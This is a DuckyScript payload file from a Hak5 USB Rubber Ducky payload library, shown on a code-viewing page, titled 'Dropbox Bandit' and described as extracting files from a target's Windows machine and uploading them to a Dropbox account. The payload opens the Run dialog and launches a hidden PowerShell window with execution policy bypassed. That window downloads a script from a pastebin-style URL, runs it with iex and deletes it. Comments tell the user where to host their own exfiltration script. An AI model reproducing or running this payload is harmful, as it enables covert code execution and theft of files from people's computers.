Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/exfiltration/Dropbox-Bandit/payload_duckyscript_old.txt
2968 views
1
REM Title: Dropbox Bandit
2
REM Author: Factor (github.com/Factor101)
3
REM Description: Extracts files from a specific location on a target's machine and uploads them to dropbox account
4
REM Target: Windows 10/11 (Powershell)
5
REM Version: 1.0
6
REM Category: Exfiltration
7
8
REM Inital Delay
9
DELAY 500
10
11
REM Open CMD
12
GUI r
13
REM Delay to allow window to open
14
DELAY 100
15
REM Launch hidden powershell window to execute our script
16
17
REM Upload your ex.ps1 payload to pastebin or dropbox (or another website, if you want) and copy the URL here
18
REM if you're using dropbox ensure the link ends with ?dl=1 and not ?dl=0
19
REM if you're using pastebin ensure you're using the "raw" link e.g. http://pastebin.com/raw/<paste_id>
20
REM --------- replace me! ----------
21
STRING powershell -w h -NoP -NonI -Exec Bypass "$e=$env:TMP+'\ex.ps1';iwr https://pastebin.com/raw/<paste_id> -O $e;iex $e;rm $e"
22
DELAY 200
23
ENTER
24
25
REM Presses CAPSLOCK to indicate that payload is finished and you can remove the Ducky
26
CAPSLOCK
27